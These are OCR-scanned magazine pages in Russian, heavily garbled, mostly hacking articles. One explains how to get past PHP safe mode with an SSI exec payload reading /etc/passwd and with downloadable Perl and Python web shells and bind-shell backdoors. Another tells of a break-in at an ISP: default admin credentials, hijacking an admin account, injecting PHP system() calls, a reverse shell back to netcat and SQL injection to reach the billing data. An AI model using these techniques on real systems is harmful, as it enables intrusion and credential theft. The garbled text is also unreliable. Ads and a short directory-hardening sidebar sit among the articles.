и сложно. Достаточно создать файл следующего содержания 
и транспортировать его на вражеский сервер: 

<И1:тІ> 

<ЬосІу> 

<!-#ехес стсі^'із -Іа /;са! /еіс/раззѵѵсІ ІІ -> 

</ЬосІу> 

</ІіітІ> 
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Скрипт также можно 
написать и по-друго- 
му, используя свой- 
ства класса сііг. Счи- 
тывание содержимого 
каталога происходит 
вот так: $еп1гу = $сііг- 
>геасІ(). А вот чтобы уз- 
нать является ли файл 
директорией, исполь- 
зуется функция із_сііг(). 

С помощью із_ѵѵгі1аЫе() 
проверяем, доступна ли 
папка на запись. В общем, исходник смотри на диске, либо тяни с мое- 
го сайта: Шр://ипіхіогде . огд/~85ііх/х/сІіг.рІір . Іхі . Так, с этим разобрались. 
Теперь, чтобы заливать файл на сервер со своего компа, мы напишем 
ѵѵеЬ-форму (примерно как на Народе). Код сценария я не буду приво- 
дить здесь — ты без труда найдешь его на диске, или тут: Шр://ипіх- 
іогде.огд/~83ііх/х/ирІоасІ .ріір.іхі. Отмечу лишь, что его нужно загрузить 
как отдельный рГір-файл, а не исполнять в еѵаі'е. Я уже говорил, что од- 
ну проблему можно решить разными путями, и в принципе, если ты хо- 
рошо знаешь рГір, то сможешь решить большинство задач на своем пу- 
ти, поэтому знать хотя бы основы этого языка все же надо. 

[ядовитая альтернатива] А теперь представь ситуацию, когда даль- 
нейшее продвижение на сервере с помощью РНР невозможно: админи- 
стратор скрупулезно настроил безопасный режим, оставив минимум 
возможностей. Однако выход, как всегда, есть. На практике частенько 
бывает возможным использовать альтернативные интерпретаторы — к 
примеру, РегІ. С вероятностью 100% он будет установлен в системе, и, 
возможно, апач так же будет настроен на выполнение .рі и .сді скриптов 
в каталоге /сді-Ып/. То есть, если возможности РНР-интерпретатора уре- 
заны слишком сильно, мы делаем следующее: 

Щ Загружаем перловый ѵѵеЬ-шелл в /сді-Ьіп/ (с помощью наших скрип- 
тов ирІоаб.рГір, либо ІіІез.рГір) 

\ 2 \ Определяем местонахождение интерпретатора РегІ (визуально, ис- 
пользуя сІіг.рГір, или же функцию ІіІе_ехіз1з(7изг/Ьіп/регГ), которая вернет 




стянуть пароль от базы? Легко! 





тестовый запуск питонового бэкдора 



юзаем 331 



очередной шелл от г57 — теперь на регІ 
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изучаем возможности сэйф мода 


1 


питоновый зГіеІІ в действии 



Ігие, если файл существует) 

[з] Меняем путь к РегІ в шелле, даем 
сІітосІ(гѵѵз.рІ,0755) 

Щ Запускаем в браузере шелл и, 
если возникнут проблемы, смотрим 
предыдущие этапы, чтобы узнать, 
на каком шагу была допущена 
ошибка. 

В качестве перлового шелла могу 
рекомендовать тебе сді-іеіпеі.рі 
(ЫІр://ипіх{огде . огд/~ззіпх/х/сді-іеІ- 
пеі.іаг.дг) и скрипт от известной ко- 
манды В5Т г57рѵѵз.рІ (ШрУ/гзі. ѵоісі.ги/ 
<бо\мп1оа<б/г57р\мз.1х1). Ну а вообще, 
в Сети лежит огромное множество 
такого рода тулз, написанных на 
РегІ, поэтому с выбором проблем у 
тебя не возникнет. 

А теперь поговорим о более экзо- 
тическом способе проникновения. 
Сейчас все большую и большую 
популярность набирает язык Руіоп 
(такая большая и толстая змея). 

Мы уже не раз писали об этом язы- 
ке, и ты должен знать, что практи- 
чески на каждом юниксовом сер- 
вере можно найти интерпретатор 
питона (обычно /изг/Ып/рубюп или 
/изг/ІосаІ/Ып/руІГіоп). На практике 
часто оказывается удобным ис- 
пользовать именно руіііоп-шеллы. 

Я расскажу тебе о популярной 




ему права доступа при помощи 



Все описанные в статье 
скрипты: 

ЕѵаІ шелл для интерпрета- 
ции ріір кодаМр:// 
ипШгде.огдДззбх/х/ 
еѵаІ_5ІіеІІ.рІірМ 
Работа с файлами: ШрУ/ипіх- 
Іогде . огд/~55бх/х/{Ие5.рбр . М 
Чтение каталогов: 
Шр://ипШгде.огд/~55йх/х/сН 
г.рбр.М 

Загрузка файлов на сервер: 
Шр://ипШгде.огд/~55йх/х/и 
рІоаб.рбр.М 

Дополнительная инфа по 
апачевскому модулю 
іпсіибе: 

ШрУ/Шрб.арасііе.огд/босз/ 
тоб/тоб_іпсІибе.ШІ 
Веб-шеллы на любой вкус 
— выбери свой: 
ШрУ/т/м.меЬ- 
йаск.т/бо тіоаб/бо т- 
Іоаб.рбр?до=77 
Довольно обширная база 
фришных хостеров: 
ЫфУЛогит.пеіг.ги/зІюѵѵібге 
аб.рбр?р=1 49508 




программе сді-руІГюп.ру. 
Принцип работы у это- 
го ѵѵеЬ-шелла точно та- 
кой же, как и у любого 
скрипта. Требуется ука- 
зать правильный путь к 
интерпретатору языка, 
запихнуть файл в /сді- 
Ып/ и не забыть поста- 
вить на него сЬтосІ +х. 
После этого шелл го- 
тов к действию и ожи- 
дает твоих команд. Ну, 
шелл, конечно, это 
очень хорошо, но ЬазЬ- 
оболочка, забинденная 
на порту, еще лучше. 
Поэтому в нашем ар- 
сенале ожидается по- 
полнение в виде ѵѵЬ_ЬіпсІ5ЬеІІ.ру. Это рулезный полноценный бэкдор на 
питоне, написанный хакером ЗегѲ'ем (за что ему огромный респект). 
Работает эта программа, как и все обычные бэкдоры, запускается из ко- 
мандной строки так: 

$ руШоп ѵѵЬ_ЬіпсізІіеІІ.ру [рогі] [раззѵѵогсі] 

Если же скрипт будет запущен без параметров, то в силу вступают стан- 
дартные настройки (РоП=50001 раззѵѵогсі ='ѵѵеЬ-Ьаск'). В разделе 
#_ОеІаиІ1_# можешь изменить любые параметры: порт, пасс, приглаше- 
ние, команда самоубийства шелла и команды, выполняемые при загруз- 
ке шелла. Заметь, что разз защищается ІѴЮ5, поэтому прежде чем ме- 
нять дефолтный в файле, сгенерируй хэш своего пасса. Автор бэкдора 
рекомендует это делать следующим образом: 

$ руФоп -с"ітроі1 тсІ5;х=тсі5.пе\А/( , уои_ра55\А/огсГ);ргіпІ х.ЬехсІідезІО". 

Можно также попробовать загрузить по Йр файл и попытаться запустить 
его через ѵѵеЬ. Даже несколько раз так получалось, что на прописанном 
порту открывался бэкдор. Прежде чем пускать питоновые скрипты в 
бой, обязательно протестируй их на локальной машине или на дружест- 
венном сервере, чтобы быть уверенным в его работе. 

[ІНе епсі?] Итак, подведем итог. Сегодня мы с тобой разобрались, как 
действовать при активированном рЬр заіе тобе, и каким путем идти для 
обхода его ограничений. Все рЬр-скрипты в статье я приводить не стал, 
а лишь привел самые общие и компактные примеры. Доделать и доду- 
мать их ты сможешь сам, если у тебя будет желание, полные же закон- 
ченные версии ты найдешь на нашем диске. Напоследок скажу тебе, что 
заниматься такими экспериментами и вообще взломами не стоит даже 
в ознакомительных целях, потому что максимум с чем ты ознакомишь- 
ся — это с усатыми дядьками в погонах с добрыми улыбками на лицах 
:). Удачи, не попадайся! е 



РУТНСМ ВІМ08НЕЦ. 

Вслед за питоновым шеллом и Ьасксіоог'ом хочу тебе расска- 
зать о еще одной замечательной тулзе на руйіоп. Софтина 
очень интересная, и, по словам одного знающего человека, 
уникальная в своем роде. Знакомься, руѴѴеЬЗЬеІІ собствен- 
ной персоной. Итак, что же такого в ней необычного? Это не 
просто очередной ѵѵеЬ-шелл, это бэкдор со встроенными 
возможностями Нйр-сервера. То есть ты запускаешь его, как 
обычный бэкдор из командной строки, потом на дефолтном 
порту открывается маленький ЬКр-сервер. После этого ты за- 
ходишь браузером по адресу Шр://ІіаскесІтасІііпе.сопп:8003 и 
— перед нами удобная ѵѵеЬ-оболочка (как у ѵѵеЬ-шелла), ко- 
торую очень легко использовать! 

В разделе # СОІЧРІѲ можно поменять порт ( РОВТ = 

8003 ) и домашнюю директорию скрипта (#ЬотесПг= м Дтр м ). 
Если ты владеешь питоном, то можешь разобраться в ис- 
ходнике и найти встроенную функцию для Др перебора 
Йр_ЬпЛ(). Этот чудесный агрегат можешь взять с Мір://ипіх- 
1огде.огд/~88Іах/х/Шр.ру, или на нашем диске. Эксклюзив, 
специально для тебя :). 




эксклюзивный бинд-шелл 
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и доблестномЗазІіікз Гуде 

История взлома жадного до чужих денег провайдера 



[преступление и наказание] 

5Р-взлом — довольно рискован- 
ное и неблагодарное занятие, 
ведь большинство провов содер- 
жат нехилый состав специалис- 
тов, техников и крутых сисадми- 
нов. Поэтому настоящий хак про- 



вайдера (а не кража рѵѵі'ок через шары) дело 



НЕДАВНО КО МНЕ ЗА ПОМОЩЬЮ ОБРАТИЛСЯ ОДИН ЧИТАТЕЛЬ. ПАРЕНЬ 
РАССКАЗЫВАЛ О ТОМ, ЧТО ВОТ УЖЕ НЕСКОЛЬКО ЛЕТ МЕСТНЫЙ ПРОВАЙ- 
ДЕР ЧЕСТНО ВОРУЕТ ДЕНЬГИ С ЕГО АККАУНТА И ВЫСТАВЛЯЕТ ЗВЕРСКИЕ 
СЧЕТА ЗА СВОИ УСЛУГИ. НЕСЧАСТНЫЙ ЮЗЕР ПОСЛУШНО ВЫКЛАДЫВАЕТ 
ЛОВАНДОС ЗА ИНЕТ (ВЕДЬ АЛЬТЕРНАТИВЫ НЕТ — ГОРОДОК МАЛЕНЬКИЙ 
И ІЗР ТАМ ТОЛЬКО ОДИН), В ТО ВРЕМЯ, КАК НЕКОТОРЫЕ («СВОИ») ПОЛЬ- 
ЗОВАТЕЛИ ПРОВАЙДЕРА ОБЛАДАЮТ АНЛИМИТНЫМИ АККАМИ И ПОЛЬЗУ- 
ЮТСЯ УСЛУГАМИ СЕТИ АБСОЛЮТНО БЕСПЛАТНО. ВСЕ, О ЧЕМ ПРОСИЛ БЕ- 
ДОЛАГА,— ДОСТАТЬ ЭТИ САМЫЕ БЕЗЛИМИТНЫЕ ПАССЫ, ЧТОБЫ ХОТЬ 
НЕМНОГО СОКРАТИТЬ ДЕФИЦИТ СВОЕГО БЮДЖЕТА. ВНИМАТЕЛЬНО ПРО- 



нелегкое, и я бы, наверно, ни за что не согла- 
сился бы откликнуться на отзыв неудачливого 
чела, если бы не посчитал это правильным. 
Суди сам, ведь втихую снимать деньги с ба- 
ланса пачками в корне неправильная полити- 
ка, и это, по сути, незаконно — обдирать на- 
род. А любое преступление должно быть нака- 
зано. По-своему. В этот раз я решил выступить 
в роле правосудия. Моя задача была довольно 
тривиальна — получить доступ к серверу и 
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проникнуть в базу биллинговой системы 







Огромная база с 
уязвимостями, в том 
числе и в тЬ-скриптах: 
і тѵѵ.весигііуіосив.сот 
ѵѵѵѵѵѵ.зесигііу.ппоѵ.ги 




На нашем диске ты най- 
дешь полные версии прог- 
рамм, описанных в этой 
статье, а также видеоро- 
лик, иллюстрирующий 
этот взлом. 



(хы, он сказал тривиальная :)). Если честно, я не знаю, зачем пошел 
на это дело, ведь кроме того, что я мог нажить себе кучу неприятнос- 
тей от провайдерского суппорта, я ничего не получал. Ну да ладно, 
к черту мелочи, пора приступать к активным действиям :). 

[за огненной стеной] Получив адрес сайта, я запустил с шелла птар. Пока 
сканер делал свое грязное дело, я решил взглянуть на сайт Ѵ.І.З.Р.'а (это наз- 
вание провайдера). Главная страница выглядела довольно прилично, все бы- 
ло на своем месте — тарифы, статистика, веб-интерфейс к мылу, гостевая кни- 
га, ссылки. Были даже чат и форум (не надо так улыбаться — это не рПрВВ 2 
:)) — они стали первыми претендентами на тщательное обследование. Прош- 
ло уже несколько минут и птар, скорее всего, уже закончил свою боевую раз- 
ведку. Но не тут-то было! Сканер упорно молчал довольно долгое время. Либо 
это сетевая ЮЗ на сервере, либо хорошо настроенный файрвол, а, может, и то 
и другое. Данное суждение никак не могло радовать. Чтобы убедиться, что же 
такое в конце концов мешает скану, я решил телнетом опробовать несколько 
стандартных портов. Большинство демонов молчали и надпись Соппесйоп 
ВеІизесІ не появлялась — значит, сервер охранялся файрволом. Так что далее 
копать эту тему не стоит, и на сервисы, которые крутились на машине, я решил 
забить. Ладно, пора вернуться к вебу. Перед тем, как ковырять чат с форумом, 
неплохо было бы заглянуть в гостевую. Отзывов было немного, в основном от 
админа, который восхищался своим чудесным сайтом :). Мое внимание прив- 
лекла адресная строка в браузере іпбех.рПр?раде=дЬ/диезІЬоок.рНр. С виду на- 
поминает любимый всеми іпсіисііпд. Попробовав подставить в параметр раде 
незабвенную строку . /. /. /. /еіс/раззѵѵсі, получил сообщение о том, что в ссылке 
присутствуют недопустимые символы. В итоге выяснилось, что скрипт жестко 
контролировал вхождение «точки» и «слэша» в имя файла, а это значило, что 
от инклуда сценарий был защищен надежно. Между тем замечу, что в этой ис- 
тории таких ситуаций будет много, когда, казалось бы, уже найден известный 
баг и его реализация, но на самом деле все намного сложнее, и, чтобы решить 
задачу, нужно подойти к ней нестандартно, не так, как обычно. А теперь прис- 
тупим к ковырянию чата. Зайдя по линку в чат, я сразу же узнал в нем доволь- 
но популярный движок Зр-СПаІ, которые молодые ѵѵеЬ-мастеры часто исполь- 
зуют в своих проектах. Довольно странно, ведь в письме чел сказал, что техо- 
бслуживание у них нехилое, и спецов не меняют. Хм, может под «техобслужи- 
ванием» имелись в виду не навороченные ѵѵеЬ-мастеры, а профессиональные 
технички с ВО и красными дипломами :). Хотя, чего греха таить, в одно время 
я и сам использовал Зр-СЬаІ на одном из своих проектов, и поэтому отчетливо 
помнил, что пароли юзеров можно было подсмотреть в одном из файлов. Я, ко- 
нечно, не помнил, были ли они в ріаіп тексте или нет, но знал наверняка, что 
доступ к ним получить возможно. А если в чате тусуется сам администратор, то 
можно заполучить заветный логин:пароль, правда, пока неясно к чему, ведь 
доступ к машине был наглухо зафильтрован файрволом, а админский интер- 
фейс к сайту я еще не нашел. Впрочем, сейчас это не так уж важно. Первым 
делом нужно было достать сорцы чата. Я отправился на №ж.\л/о\/ѵеЬ.ги, и в раз- 
деле скрипты -> РНР Чаты нашел нужный нам движок, благо, версии у 
них были идентичны: 2.21 . Скачав архив, я принялся тщательно изучать сорцы. 



Первым делом меня интересовал доступ к папке сіаіа/изегз (как я предполагал, 
там и находились параметры учетных записей юзеров) и файлу сЬа1:_сІЬ. Но в 
папке баіа лежал .Ыассезз, который, по идее, запрещал доступ к любому эле- 
менту каталога. Тут я ненадолго замешкался, но, решив, что «была-не была», 
все же ввел в браузер тт.ѵізр.сот.иа/зрсНаІ/сІаІа/изегз. Мне повезло, и в Опе- 
ре отобразился листинг всех юзеров чата (то есть файл .Ыассезз не работал, и 
апач разрешал мне свободно просматривать папку с информацией о пользо- 
вателях). Был, правда, один минус — я не мог прочесть ни одного файла, пото- 
му что не учел, что инфа хранится в формате рЬр-кода и, соответственно, ѵѵеЬ- 
сервер просто выполнял эти сценарии, не показывая мне кода :). 

[пробиваем брешь] Перейдем к претенденту на проверку номер два — 
к форуму. Как я уже говорил, это был не обожаемый всеми админами 
рЬрВВ 2.0.x, а более экзотический форум, который я раньше не встречал, 
— ЗоЙѵѵаге РВІ_апд версии 4.60. Первым делом нужно было зарегистриро- 
ваться, чтобы потом продолжить свои злодеяния. Пока я регистрировался 
под шпионским аккаунтом рірес, мне предложили выбрать аватару, но, 
к сожалению, пункта «закачать_ѵѵеЬ-шелл_как-аватару» не было :(. 
В общем, загрузить свою аватарку на сервер не разрешалось, а можно бы- 
ло либо указать линк на картинку, либо выбрать ее из списка стандартных. 
Итак, залогинившись под пользователем рірес, я начал бродить по форуму. 
Первое, что меня интересовало, — кто, собственно, админит эту борду. 
Просмотрев список пользователей, я выяснил, что админом борды был какой- 
то подозрительный тип гражданской наружности с ником тауигеѵ. 

Этот самый Маюрев был администратором сайта и, похоже, всего ІЗР'шно- 
го сервера. Теперь мне нужно было получить информацию об уязвимостях 
в форуме, которые бы позволили мне либо поднять права до администра- 
торских, либо получить возможность взаимодействовать с машиной 
(читать директории, выполнять команды и так далее). В Гугле нашлась не- 




какие еще уязвимости скрывает форум? 
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сайт жлобской конторы 
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хилая стопка сайтов с описанием багов к борде. В первую очередь там фи- 
гурировали разнообразные дырки, которые позволяли осуществить ХЗЗ. 
Но больше меня заинтересовала возможность раскрытия пользовательс- 
ких данных. Сейчас немного расскажу об этом баге. Допустим, форум уста- 
новлен в каталоге /Ііоте/риЫіс_ЫтІ/рЫапд/. Если мы залогинимся и обра- 
тимся с браузером к уѵуѵуѵ. ехатріе . сот/рЫапд/зепсІрт .ріір ?іо=абтіп& зиЬ}= 
уои_аге_таіака&пит= 1 & огід=/Ііоте/риЫіс_МтІ/рЫапд/сіЬ/тетЬег5/асІтіп , 
то в результате должны прочесть файл с пользовательскими настройками, 
где будет находиться вся информация об этом юзере. Самые сладкие све- 
дения лежат в первых нескольких строках: 

$изегісІ="1 

$раз5\л/огсІ="тут будет ІѴЮ5 хэш"; 

$изегпате="СооІ_Абтіп"; 

Теперь мне оставалось лишь составить подобный линк и скормить его бра- 
узеру, чтобы в ответ получить данные администратора с ником тауигеѵ. 
Но меня постиг облом — вместо ожидаемой инфы меня просто перебро- 
сило в форму для отправки РМ. Значит, нужно было искать другой путь. 
На некоторое время я задумался, что может мне помочь продвинуться 
дальше. Проходя весь путь от захода на сайт до текущего момента, я вспо- 
минал детали. Вспомнив, что, ковыряя чат, я мог просматривать содержи- 
мое его папок, причем вложенный в каталог .Иіассезз не активировался и 
не препятствовал просмотру. Если с помощью уязвимостей в форуме я не 
могу читать пользовательские файлы, то стоило попробовать просмотреть 
директорию через браузер. В адресной строке я дописал сІЬ/тетЬегз/ и ... 
увидел конфиги всех юзеров борды с мылами и хэшами паролей! Достав 
конфиг тауигеѵ, я загрузил его в ІѴЮбІпзісІе. Запустив софтину, я стал 
ждать. Но гадский пароль не хотел расшифровываться ни в какую. Прош- 
ло больше четырех часов, а перебор все продолжался и продолжался. 
Я решил не ждать окончания брутфорса, а продвигаться дальше, ведь, ес- 
ли что, мне было куда отступать — у меня была база с форума. 

[іпіііігаііоп] Как ты уже понял, в ходе исследования сервера я обнару- 
жил возможность просмотра содержимого каталогов ѵѵеЬ-сервера. 
Впрочем, это получалось не всегда, но даже в таком случае просмотр 
блокировался не арасГіе, а ѵѵеЬ-скриптом, который входил в комплект 
какого-нибудь проекта. Например, та же борда не позволяла мне шас- 
тать по всем папкам, выдавая Ыісе Ігу Ього! :). 

И я вновь вернулся на главную страницу . Адрес ее выглядел так: 
тж.ѵізр.сот.иа/зіІе/З/іпсІех.рІір. Теперь, зная, что возможно читать практи- 
чески любой каталог в ООСІІМЕІ\ІТ_РЮОТ, я смело изменил содержание ад- 
ресной строки на шш.ѵізр.сот.иа/зііе. Передо мной вырисовалась довольно 
любопытная картина: 

в папке лежали две неизведанные папки и несколько гифок: /4 и /5. 



В папке /4 лежал какой-то небольшой сайт, и что-то в нем мне показалось 
очень знакомым, он имел что-то схожее с іпсіех'ом Ѵ.І.З.Т'а. И только пе- 
рейдя в /5, я все понял, потому что в верхушке страницы красовалась над- 
пись: «Автоматическая система управления сайтом «РНР 2епег». Причем 
структура сайта была как две капли воды похожа на предыдущую. Вывод 
напрашивался сам собой — во всех трех папках (включая сам сайт про- 
вайдера) лежит одна и та же СМ3. Да, действительно, провайдерский 
сайт был построен на этой системе, о чем правдиво свидетельствовало 
лого РоѵѵегесІ Ьу РНР 2епег на главной страничке у ІЗР. Так, теперь нуж- 
но нарыть сорсы этой ЦМС, чтобы продолжить ковырять сайт. На сайте 
производителя я нашел 300-килобайтный архив с сорцами системы. 
Давай разберемся, зачем мне понадобились исходники. Как в любой систе- 
ме управления, в 2ЕЫЕВ РНР есть администраторский интерфейс. Кроме то- 
го, большинство бесплатных скриптов имеют стандартные, заданные по 
умолчанию комбинации «логин:пароль». В исходниках я хотел найти именно 
дефолтный аккаунт, для того, чтобы потом попробовать залогиниться в СМ3. 
Разархивировав сорцы, я бегло начал просматривать папки со скриптами. 
Внимание сразу же привлек файл изегзІізІ.рИр. Да, так я и думал — имен- 
но в нем и находились две стандартные учетные записи асітіп и есіііог. 
Хотя вместо паролей в чистом виде там лежали уже порядком поднадоев- 
шие хэши, но это не было такой уже трагедией, так как не сложно было до- 
гадаться, какие пароли стояли по умолчанию к этим учетным записям :). 
Вернувшись на сайт с СМ3 в папку /5, я залогинился под асІтіп:асІтіп, 
и под списком разделов в левой части меню появилась ссылка на админс- 
кий интерфейс! Теперь я админ, да здравствует Франция! :) 

[административные проблемы] В центре администрирования меня 
прежде всего заинтересовал раздел «Файловый архив». Как было написа- 
но в хэлпе, тут можно было с легкостью создать группу файлов и загру- 
жать/удалять из нее инфу. Впрочем, все обстояло немного по-другому. 
Загрузить файл у меня не получалось, и причина крылась не столько 
в кривых руках, сколько в специфической структуре СМ3. То есть «зака- 
чать» файл на сервер было нельзя, можно просто из этого меню сделать 
на него линк, в то время как сам файл должен находиться на локальной 
машине в папке боѵѵпіоасі. Если же инфа находится на удаленном хосте, то 
на нее просто создается прямая ссылка. Получив облом с заливкой, я пе- 
решел в раздел «файловый менеджер», и тут неожиданно скрипт заругал- 
ся на отсутствие какого-то конфигурационного файла. Либо это было сде- 
лано намеренно, либо ѵѵеЬ-мастеры профессионально курят бамбук :). 

Так как работать с файлами я не имел возможности, я начал искать, куда 
бы можно было вставить свой рГір-код. Кроме того, редактировать я мог не 
все разделы из центра администрирования, что было довольно странно (к 
примеру, если я пытался изменить внешний вид главной страницы, то из- 
менения попросту не сохранялись — как будто я был непривилегированым 
пользователем). Все эти обстоятельства заставили меня искать нестанда- 



БЕСПЛАТНЫЙ СЫР 

Как ты видишь, сайт ІЗР состоял 
практически полностью из фривар- 
ных скриптов и был построен на ос- 
нове небольшой бесплатной СМ3, 
что от части его и погубило. Вспом- 
ни, бесплатный сыр бывает только 
в мышеловке. Фриварные скрипты 



тем и хороши, что ты всегда можешь 
скачать их и, при желании, разоб- 
раться в структуре сценариев. Поэ- 
тому если ты увидел какой-нибудь 
популярный движок на сайте, то 
смело ищи в интернете архив с его 
исходником и принимайся за изуче- 
ние. Можно также обратиться к пор- 



талам по компьютерной безопаснос- 
ти, где, вероятно, будет информация 
об уязвимостях проекта. Но глупое 
«скачал -> запустил» не должно ста- 
новиться принципом. Ведь, если гра- 
мотно настроить даже фриварный 
проект, тебя вряд ли поломают злые 
хакеры. Имей это в виду. 








МЕТРО 2 



* воссозданные с фотографической точностью 
реальные московские места* станции 
метрополитена, Кремль, стройка МГУ; 



засекреченные объекты! Д6 - военная 
транспортная ветка под Москвой, известная 
также как <кМетро-2к>, секретные лаборатории, 

б у н к е р— С-т^а л и н а — 



подлинное оружие, в том числе не 
встречавшиеся ранее в играх образцы, такие 
как противотанковая винтовка ПТРС— 41. 
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ртный выход из ситуации. Но я продолжил поиски для внедрения в сайт 
произвольного рГір-кода. Я выяснил, что данные можно было вставлять ли- 
бо в тело новости, либо в текст статьи. Причем тэги «<» и «>» фильтрова- 
лись. Нужно было действовать другим путем. Давай на секунду приостано- 
вимся и еще раз выясним, как все обстояло. Во-первых, на машине было 
3 СМ5, причем к двум из них я имел доступ (они были «пустышками», то 
есть рабочие сайты на них не крутились, был только основной шаблон. 
Третья СМ3 как раз работала в качестве сайта ІЗР, но залогиниться под ад- 
мином туда было нельзя, потому что самой формочки для аутентификации 
просто-напросто не было. Решено было попробовать исследовать систему 
управления сайтом в папке /4. Туда я тоже залогинился под абтіп и опять 
прошелся по разделам — снова та же ситуация, что и в прошлой СМ3. Но 
точно я знал, что разгадка крылась где-то рядом, но не мог понять, где 
именно. И вновь что-то заставило меня вернуться на главный провайдерс- 
кий сайт. И тут, к моему удивлению, под меню с линками на форум, чат и 
гостевую появилась ссылка на администраторский интерфейс! Давай раз- 
беремся, почему это произошло. Смотри, когда я логинюсь под админом, 
в папке /5 или /4 начинается новая админская сессия. Как ты знаешь, обыч- 
но сессия длится до закрытия браузера, и действует она в пределах всего 
домена, который эту сессию открыл. А это значит, что если бы я залогинил- 
ся в одной СМ3, то автоматически логинился бы под тем же юзером на дру- 
гих. В обычном состоянии линк на панель администрирования недоступен, 
но как только ты заходишь под администратором, ссылка появляется. 
Я был на сто процентов уверен, что именно в этой СМЗ'ке файловый 
менеджер работает нормально и без косяков. Но картина оказалась не са- 
мой утешающей — та же ошибка об отсутствии файла. Перейдя в пункт 
«Внешний вид» (там содержится инфа о том, как будет отображаться глав- 
ная страница), я увидел формочки с подписями «баннер» и «счетчик» (там 
хранились их НтІ-коды), причем в поле «счетчик» рГір-тэги не фильтрова- 
лись, там напрямую подключался сценарий счетчика! То есть, другими сло- 
вами, я мог вставить в это окошко свой кусок кода, и он должен был выпол- 
ниться. Я скопировал текст счетчика в блокнот, а на его место всунул нехит- 
рый скрипт <?рГір зуз1ет("ісГ); ?>. Сохранив изменения, я обновил главную 
страницу (счетчик находился на ней), но результата выполнения команды 
видно не было. Я был уже в одном шаге от успеха, но мне осталось разоб- 
раться, почему не происходило сохранения изменений. Методом исключи- 
тельно научного тыка я попал в раздел «управление пользователями» и 
увидел несколько учетных записей. Человек пять из них были простые юзе- 
ры, и лишь один обладал правами админа сайта — это был тот самый 
тауигеѵ :).Я просмотрел инфу о его учетной записи: тут было очень много 
полезных данных, в том числе и форма для изменения пароля. То есть, 
грубо говоря, я мог внаглую поменять пароль тауигеѵ'у, залогиниться под 
ним и сделать с сайтом все что угодно, начиная от красивого дефейса, за- 
канчивая выполнением системных команд через формочку для кода счет- 




чика и полным дестроем сайта. Причем никаких ограничений у этого 
пользователя, в отличии от юзера абтіп, не было. Впрочем, было одно 
«но»: если я поменяю пароль, то спалюсь. К счастью, СМ3 у нас была, как 
ты помнишь, не одна, а целых три (в папках /3, /4, /5). Возможно, тауигеѵ 
создал несколько учетных записей в одной из этих (в качестве теста). Так 
и случилось — в СМ3 /4 был создан точно такой же пользователь тауигеѵ 
с неограниченными правами. Все! Выход найден. Меняем маюреву па- 
роль и заходим под ним в раздел «внешний вид», где в форму счетчика 
вписываем <?рГір зуз1ет("ипате -а; ѵѵ ; Із -Іа/"); ?>. Сохраняем изменения, 
и топаем на главную страницу — ура! Системная команда выполнилась, 
и показала версию ОС (к слову, это был линукс с неандертальским ядром 
2.2.24). Теперь самое время начать свое вторжение к центру машины. 

[последние штрихи] Самый простой план действий состоял в заг- 
рузке на сервер ѵѵеЬ-шелла и последующей организацией Ьаск-соппес- 
І'а (ведь все порты тачки были наглухо закупорены файрволом). Сказа- 
но — сделано, загрузив гзі шелл (уже ставший классикой), я запустил на 
своей доверенной машине пеХсаХ на 4000 порту. 

Реверсивный перловый бэкдор послушно приконектился. Теперь у меня был 
доступ к полноценной оболочке. Следующим моим заданием было выявле- 
ние местонахождения биллинговой базы. Это было довольно просто. 
На главной странице Ѵ.І.З.Р'а была ссылка на статистику использования ак- 
каунта. Скрипт статистики был нехитрым: нужно было ввести логин и па- 
роль, причем сценарий страдал простейшей ЗОЬинъекцией. Если в качест- 
ве пароля передать кавычку ('), скрипт без вопросов пропустит на страницу 
и выведет подробный отчет о состоянии счета (жалко, что пароль не выводил). 
Если скрипт выдает инфу о счете, значит, он напрямую связан с биллинговой 
системой. Сценарий статистики назывался ассоипісді. Поэтому мне остава- 
лось вбить в консоли Іосаіе ассоипісді и сделать ГіеасІ на нужный файл © 




успешная атака святая святых провайдера — биллинговой базы 



СКРЫТНЫЙ ИНДЕЕЦ 

Вообще-то по умолчанию индеец Арасііе 
не должен показывать содержимое ката- 
логов. Специалисты и вовсе рекоменду- 
ет отключать индексирование каталогов. 
Если ты параноик, то можешь вообще 
удалить модуль тоб_аіЛоіпсІех. Если же 
индексация каталогов все же нужна, то 



необходимо позаботиться, чтобы конфи- 
денциальные данные были защищены. 
Для этого придуманы файлы .Иіассез 
.ІіфаззѵѵсІ. Они служат для разграниче- 
ния доступа и аутентификации. Поэтому, 
если тебе дорога твоя инфа, не поле- 
нись запретить важный каталог для 
просмотра извне. Например, так: 



Ііпих_Ьох# саІхМассезз 
Огсіег сіепу.аііоѵѵ 
йепе Ігот аІІ 
АІІоѵѵ Ігот 127.0.0.1 

Это запретит кому-либо просматривать 
эту директорию, если только подключе- 
ние не было осуществлено с локалхоста. 









...и ты в интернете! 
Кнопка і-тобе™ - это быстрый доступ 
к возможностям интернета в твоем мобильном 
телефоне. Почта, новости, афиша, погода, спорт, 
мелодии, картинки и многое другое. Теперь не нужно 
никаких настроек. Все просто: теперь твой новый 
телефон с кнопкой і-тобе уже готов к работе! 



Подробности в офисах МТС 
и центрах мобильной связи СВЯЗНОЙ 
ѵѵѵѵѵѵ.ітобе.тіз.ги ѵѵѵѵѵѵ.зѵуагпоу.ги 



новая кнопка на твоем мобильном 



будь в і-тосіе 



Ты войдешь 

быстрее 

чем перевернешь 
эту страницу! 



Нажми на кнопку 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




Есть ли жизнь под РОоЗ-ом? 



В МАССОВЫХ ИЗДАНИЯХ ТЕМА 0003 ОСВЕЩЕНА СО ВСЕХ СТОРОН. 
МНОГИЕ АВТОРЫ ПИШУТ О 0003-АТАКАХ, ОБ ИХ РЕАЛИЗАЦИЯХ И О 
ПОСЛЕДСТВИЯХ. НО МАЛО КТО ЗАДУМЫВАЕТСЯ ПО ПОВОДУ ВОПРО- 
СА ЗАЩИТЫ ОТ ПОДОБНЫХ НАПАДЕНИЙ. КОГДА КОНЕЧНЫЙ ПОЛЬЗО- 
ВАТЕЛЬ САМ СТАЛКИВАЕТСЯ С ТАКОЙ АТАКОЙ, ТО, ПО ПОНЯТНЫМ 
ПРИЧИНАМ, ОН НЕ ЗНАЕТ, ЧТО ДЕЛАТЬ, И КУДА БЕЖАТЬ. НА САМОМ 
ДЕЛЕ, НИКУДА БЕЖАТЬ НЕ НАДО — ДОСТАТОЧНО ПРОЧИТАТЬ ЭТУ 

СТАТЬЮ I Докучаев Дмитрий ака РогЬ (!огЬ@геаІ. хакер. ш) 




Методы защиты 
от масштабных нападений 

